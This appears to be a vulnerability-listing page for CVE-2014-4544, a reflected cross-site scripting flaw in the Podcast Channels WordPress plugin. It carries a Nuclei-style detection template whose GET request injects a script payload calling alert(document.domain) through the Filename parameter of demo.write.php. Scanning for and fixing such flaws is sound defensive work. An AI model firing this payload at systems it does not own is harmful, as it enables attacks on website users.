CVE-2014-4544: Podcast Channels < 0.28 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Podcast Channels | POC: 已公开

漏洞描述

The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.

PoC代码[已公开]

id: CVE-2014-4544

info:
  name: Podcast Channels < 0.28 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
    - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2014-4544
    cwe-id: CWE-79
    epss-score: 0.02584
    epss-percentile: 0.85058
    cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: podcast_channels_project
    product: podcast_channels
    framework: wordpress
  tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402204e25dbbdd9121174d329273bf75e68e95714791017ebd07f38752e075cb6aff202203495d4187528c9022777bf63b2ab6c792cc5bf73a3f4b76b8a302a919a731b6c:922c64590222798bb761d5b6d8e72950